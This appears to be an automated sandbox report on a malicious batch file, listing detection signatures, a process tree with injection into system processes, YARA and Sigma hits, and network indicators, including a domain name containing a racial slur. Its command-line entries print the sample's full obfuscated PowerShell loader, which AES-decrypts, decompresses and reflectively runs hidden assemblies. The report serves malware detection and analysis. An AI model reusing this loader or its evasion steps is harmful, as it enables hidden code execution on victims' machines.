Windows Analysis Report
product.bat

Overview

General Information

Sample name: product.bat
Analysis ID: 1574670
MD5: f3454e2cb275019527e248cb08111111
SHA1: 4180893cca4dce02e0bbeab52b5a099201db5ffb
SHA256: 0999322e8a2a984b5400544b31a91ae8dd49b362a2517fe497a8e1455de07d8f
Tags: bat, user-lontze7

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Found large BAT file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs a global keyboard hook
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Powershell drops PE file
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Suspicious command line found
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 2268 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\product.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7276 cmdline: wmic diskdrive get Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • findstr.exe (PID: 7304 cmdline: findstr /i /c:"QEMU HARDDISK" /c:"WDS100T2B0A" /c:"DADY HARDDISK" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • cmd.exe (PID: 7428 cmdline: cmd.exe /c echo function vhVnA($zVdEq){ $TQYfY=[System.Security.Cryptography.Aes]::Create(); $TQYfY.Mode=[System.Security.Cryptography.CipherMode]::CBC; $TQYfY.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $TQYfY.Key=[System.Convert]::FromBase64String('axHRlwLJv4pwkbOf9iAIJflO6gLEZt+6bKCh3RuytCA='); $TQYfY.IV=[System.Convert]::FromBase64String('TxAvkYK6lZIDMpmpV8o+4Q=='); $bqyNP=$TQYfY.CreateDecryptor(); $fZHAT=$bqyNP.TransformFinalBlock($zVdEq, 0, $zVdEq.Length); $bqyNP.Dispose(); $TQYfY.Dispose(); $fZHAT;}function FpYMp($zVdEq){ Invoke-Expression '$fEGds=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$zVdEq);'.Replace('*', ''); Invoke-Expression '$xpQRA=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$mCrfz=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($fEGds, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $mCrfz.CopyTo($xpQRA); $mCrfz.Dispose(); $fEGds.Dispose(); $xpQRA.Dispose(); $xpQRA.ToArray();}function zHrKT($zVdEq,$ulmvt){ Invoke-Expression '$kTVmP=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$zVdEq);'.Replace('*', ''); Invoke-Expression '$aPGUN=$kTVmP.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$aPGUN.*I*n*v*o*k*e*($null, $ulmvt);'.Replace('*', '');}$SQOtV = 'C:\Users\user\Desktop\product.bat';$host.UI.RawUI.WindowTitle = $SQOtV;$KFKSq=[System.IO.File]::ReadAllText($SQOtV).Split([Environment]::NewLine);foreach ($vmudF in $KFKSq) { if ($vmudF.StartsWith('iecMs')) { $hJZkz=$vmudF.Substring(5); break; }}$bRzqF=[string[]]$hJZkz.Split('\');Invoke-Expression '$STi = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$JnT = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$UpD = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');zHrKT $STi $null;zHrKT $JnT $null;zHrKT $UpD (,[string[]] ('')); MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • powershell.exe (PID: 7436 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
      • dllhost.exe (PID: 7680 cmdline: C:\Windows\System32\dllhost.exe /Processid:{372c9116-8a11-4207-941c-c83db9f8d8a2} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
        • winlogon.exe (PID: 556 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
          • dllhost.exe (PID: 1660 cmdline: C:\Windows\System32\dllhost.exe /Processid:{29a28251-c10b-42e7-8393-a6c218333ff2} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
            • svchost.exe (PID: 1752 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1760 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1804 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • lsass.exe (PID: 632 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
          • svchost.exe (PID: 2524 cmdline: C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 912 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • dwm.exe (PID: 976 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
        • svchost.exe (PID: 356 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 704 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 932 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1044 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1064 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1080 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1188 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1212 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1344 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1376 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1388 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1400 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1436 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1520 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1636 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1668 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • cmd.exe (PID: 7764 cmdline: "C:\Windows\System32\cmd.exe" /C type C:\Users\user\Desktop\product.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7896 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7972 cmdline: wmic diskdrive get Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • findstr.exe (PID: 7988 cmdline: findstr /i /c:"QEMU HARDDISK" /c:"WDS100T2B0A" /c:"DADY HARDDISK" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
        • cmd.exe (PID: 8156 cmdline: cmd.exe /c echo function vhVnA($zVdEq){ $TQYfY=[System.Security.Cryptography.Aes]::Create(); $TQYfY.Mode=[System.Security.Cryptography.CipherMode]::CBC; $TQYfY.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $TQYfY.Key=[System.Convert]::FromBase64String('axHRlwLJv4pwkbOf9iAIJflO6gLEZt+6bKCh3RuytCA='); $TQYfY.IV=[System.Convert]::FromBase64String('TxAvkYK6lZIDMpmpV8o+4Q=='); $bqyNP=$TQYfY.CreateDecryptor(); $fZHAT=$bqyNP.TransformFinalBlock($zVdEq, 0, $zVdEq.Length); $bqyNP.Dispose(); $TQYfY.Dispose(); $fZHAT;}function FpYMp($zVdEq){ Invoke-Expression '$fEGds=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$zVdEq);'.Replace('*', ''); Invoke-Expression '$xpQRA=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$mCrfz=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($fEGds, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $mCrfz.CopyTo($xpQRA); $mCrfz.Dispose(); $fEGds.Dispose(); $xpQRA.Dispose(); $xpQRA.ToArray();}function zHrKT($zVdEq,$ulmvt){ Invoke-Expression '$kTVmP=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$zVdEq);'.Replace('*', ''); Invoke-Expression '$aPGUN=$kTVmP.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$aPGUN.*I*n*v*o*k*e*($null, $ulmvt);'.Replace('*', '');}$SQOtV = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $SQOtV;$KFKSq=[System.IO.File]::ReadAllText($SQOtV).Split([Environment]::NewLine);foreach ($vmudF in $KFKSq) { if ($vmudF.StartsWith('iecMs')) { $hJZkz=$vmudF.Substring(5); break; }}$bRzqF=[string[]]$hJZkz.Split('\');Invoke-Expression '$STi = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$JnT = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$UpD = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');zHrKT $STi $null;zHrKT $JnT $null;zHrKT $UpD (,[string[]] ('')); MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 8164 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
          • schtasks.exe (PID: 1624 cmdline: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • conhost.exe (PID: 1504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
Source: Process Memory Space: powershell.exe PID: 8164
Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC
Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Author: ditekSHen
Strings:
  • 0x58d1:$b2: ::FromBase64String(
  • 0x1ece07:$b2: ::FromBase64String(
  • 0xa2242e:$b2: ::FromBase64String(
  • 0xa2248c:$b2: ::FromBase64String(
  • 0xa92ba4:$b2: ::FromBase64String(
  • 0x9e314f:$s1: -join
  • 0x9e432d:$s1: -join
  • 0xa1c6a1:$s1: -join
  • 0xa13f5e:$s3: Reverse
  • 0xa1ec0f:$s3: Reverse
  • 0x9dee08:$s4: +=
  • 0x9dee27:$s4: +=
  • 0x9dee62:$s4: +=
  • 0x9dee7f:$s4: +=
  • 0x9deeba:$s4: +=
  • 0x9def26:$s4: +=
  • 0x9defb2:$s4: +=
  • 0x9df0c0:$s4: +=
  • 0x9e0d3a:$s4: +=
  • 0x9e0d5d:$s4: +=
  • 0x9e45dc:$s4: +=

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: cmd.exe /c echo function vhVnA($zVdEq){ $TQYfY=[System.Security.Cryptography.Aes]::Create(); $TQYfY.Mode=[System.Security.Cryptography.CipherMode]::CBC; $TQYfY.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $TQYfY.Key=[System.Convert]::FromBase64String('axHRlwLJv4pwkbOf9iAIJflO6gLEZt+6bKCh3RuytCA='); $TQYfY.IV=[System.Convert]::FromBase64String('TxAvkYK6lZIDMpmpV8o+4Q=='); $bqyNP=$TQYfY.CreateDecryptor(); $fZHAT=$bqyNP.TransformFinalBlock($zVdEq, 0, $zVdEq.Length); $bqyNP.Dispose(); $TQYfY.Dispose(); $fZHAT;}function FpYMp($zVdEq){ Invoke-Expression '$fEGds=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$zVdEq);'.Replace('*', ''); Invoke-Expression '$xpQRA=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$mCrfz=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($fEGds, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $mCrfz.CopyTo($xpQRA); $mCrfz.Dispose(); $fEGds.Dispose(); $xpQRA.Dispose(); $xpQRA.ToArray();}function zHrKT($zVdEq,$ulmvt){ Invoke-Expression '$kTVmP=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$zVdEq);'.Replace('*', ''); Invoke-Expression '$aPGUN=$kTVmP.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$aPGUN.*I*n*v*o*k*e*($null, $ulmvt);'.Replace('*', '');}$SQOtV = 'C:\Users\user\Desktop\product.bat';$host.UI.RawUI.WindowTitle = $SQOtV;$KFKSq=[System.IO.File]::ReadAllText($SQOtV).Split([Environment]::NewLine);foreach ($vmudF in $KFKSq) { if ($vmudF.StartsWith('iecMs')) { $hJZkz=$vmudF.Substring(5); break; }}$bRzqF=[string[]]$hJZkz.Split('\');Invoke-Expression '$STi = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$JnT = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$UpD = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');zHrKT $STi $null;zHrKT $JnT $null;zHrKT $UpD (,[string[]] ('')); , CommandLine: cmd.exe /c echo function vhVnA($zVdEq){ $TQYfY=[System.Security.Cryptography.Aes]::Create(); $TQYfY.Mode=[System.Security.Cryptography.CipherMode]::CBC; $TQYfY.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $TQYfY.Key=[System.Convert]::FromBase64String('axHRlwLJv4pwkbOf9iAIJflO6gLEZt+6bKCh3RuytCA='); $TQYfY.IV=[System.Convert]::FromBase64String('TxAvkYK6lZIDMpmpV8o+4Q=='); $bqyNP=$TQYfY.CreateDecryptor(); $fZHAT=$bqyNP.TransformFinalBlock($zVdEq, 0, $zVdEq.Length); $bqyNP.Dispose(); $TQYfY.Dispose(); $fZHAT;}function FpYMp($zVdEq){ Invoke-Expression '$fEGds=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$zVdEq);'.Replace('*', ''); Invoke-Expression '$xpQRA=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$mCrfz=New-Object S*y
Source: Process started; Author: Florian Roth (Nextron Systems), Tim Shelton; Data: Command: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F, CommandLine: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F, CommandLine|base64offset|contains: 7z, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: powershell.exe -WindowStyle Hidden, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 8164, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F, ProcessId: 1624, ProcessName: schtasks.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: cmd.exe /c echo function vhVnA($zVdEq){ $TQYfY=[System.Security.Cryptography.Aes]::Create(); $TQYfY.Mode=[System.Security.Cryptography.CipherMode]::CBC; $TQYfY.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $TQYfY.Key=[System.Convert]::FromBase64String('axHRlwLJv4pwkbOf9iAIJflO6gLEZt+6bKCh3RuytCA='); $TQYfY.IV=[System.Convert]::FromBase64String('TxAvkYK6lZIDMpmpV8o+4Q=='); $bqyNP=$TQYfY.CreateDecryptor(); $fZHAT=$bqyNP.TransformFinalBlock($zVdEq, 0, $zVdEq.Length); $bqyNP.Dispose(); $TQYfY.Dispose(); $fZHAT;}function FpYMp($zVdEq){ Invoke-Expression '$fEGds=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$zVdEq);'.Replace('*', ''); Invoke-Expression '$xpQRA=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$mCrfz=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($fEGds, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $mCrfz.CopyTo($xpQRA); $mCrfz.Dispose(); $fEGds.Dispose(); $xpQRA.Dispose(); $xpQRA.ToArray();}function zHrKT($zVdEq,$ulmvt){ Invoke-Expression '$kTVmP=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$zVdEq);'.Replace('*', ''); Invoke-Expression '$aPGUN=$kTVmP.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$aPGUN.*I*n*v*o*k*e*($null, $ulmvt);'.Replace('*', '');}$SQOtV = 'C:\Users\user\Desktop\product.bat';$host.UI.RawUI.WindowTitle = $SQOtV;$KFKSq=[System.IO.File]::ReadAllText($SQOtV).Split([Environment]::NewLine);foreach ($vmudF in $KFKSq) { if ($vmudF.StartsWith('iecMs')) { $hJZkz=$vmudF.Substring(5); break; }}$bRzqF=[string[]]$hJZkz.Split('\');Invoke-Expression '$STi = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$JnT = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$UpD = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');zHrKT $STi $null;zHrKT $JnT $null;zHrKT $UpD (,[string[]] ('')); , CommandLine: cmd.exe /c echo function vhVnA($zVdEq){ $TQYfY=[System.Security.Cryptography.Aes]::Create(); $TQYfY.Mode=[System.Security.Cryptography.CipherMode]::CBC; $TQYfY.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $TQYfY.Key=[System.Convert]::FromBase64String('axHRlwLJv4pwkbOf9iAIJflO6gLEZt+6bKCh3RuytCA='); $TQYfY.IV=[System.Convert]::FromBase64String('TxAvkYK6lZIDMpmpV8o+4Q=='); $bqyNP=$TQYfY.CreateDecryptor(); $fZHAT=$bqyNP.TransformFinalBlock($zVdEq, 0, $zVdEq.Length); $bqyNP.Dispose(); $TQYfY.Dispose(); $fZHAT;}function FpYMp($zVdEq){ Invoke-Expression '$fEGds=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$zVdEq);'.Replace('*', ''); Invoke-Expression '$xpQRA=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$mCrfz=New-Object S*y
Source: File created; Author: frack113, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8164, TargetFilename: C:\Windows\$nya-onimai2\IhrFKM.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\System32\dllhost.exe /Processid:{372c9116-8a11-4207-941c-c83db9f8d8a2}, ParentImage: C:\Windows\System32\dllhost.exe, ParentProcessId: 7680, ParentProcessName: dllhost.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 912, ProcessName: svchost.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell.exe -WindowStyle Hidden, CommandLine: powershell.exe -WindowStyle Hidden, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\product.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2268, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden, ProcessId: 7436, ProcessName: powershell.exe
No Suricata rule has matched

AV Detection

Source: Submitted Sample; Integrated Neural Analysis Model: Matched 99.1% probability
Source: C:\Windows\$nya-onimai2\IhrFKM.exe; Joe Sandbox ML: detected
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EC68D894 FindFirstFileExW,32_2_000001A9EC68D894
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EC68DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,32_2_000001A9EC68DA18
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EC6BD894 FindFirstFileExW,32_2_000001A9EC6BD894
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EC6BDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,32_2_000001A9EC6BDA18
Source: C:\Windows\System32\svchost.exeCode function: 33_2_0000019FF163DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,33_2_0000019FF163DA18
Source: C:\Windows\System32\svchost.exeCode function: 33_2_0000019FF163D894 FindFirstFileExW,33_2_0000019FF163D894
Source: C:\Windows\System32\svchost.exeCode function: 33_2_0000019FF19ADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,33_2_0000019FF19ADA18
Source: C:\Windows\System32\svchost.exeCode function: 33_2_0000019FF19AD894 FindFirstFileExW,33_2_0000019FF19AD894
Source: global trafficTCP traffic: 192.168.2.7:49764 -> 103.230.121.81:4988
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: iam.nigga.dad
Source: lsass.exe, 00000010.00000000.1416970653.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000002.3360104518.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1417029020.0000017D2D551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000002.3363525081.0000017D2D551000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: lsass.exe, 00000010.00000000.1417029020.0000017D2D551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000002.3363525081.0000017D2D551000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
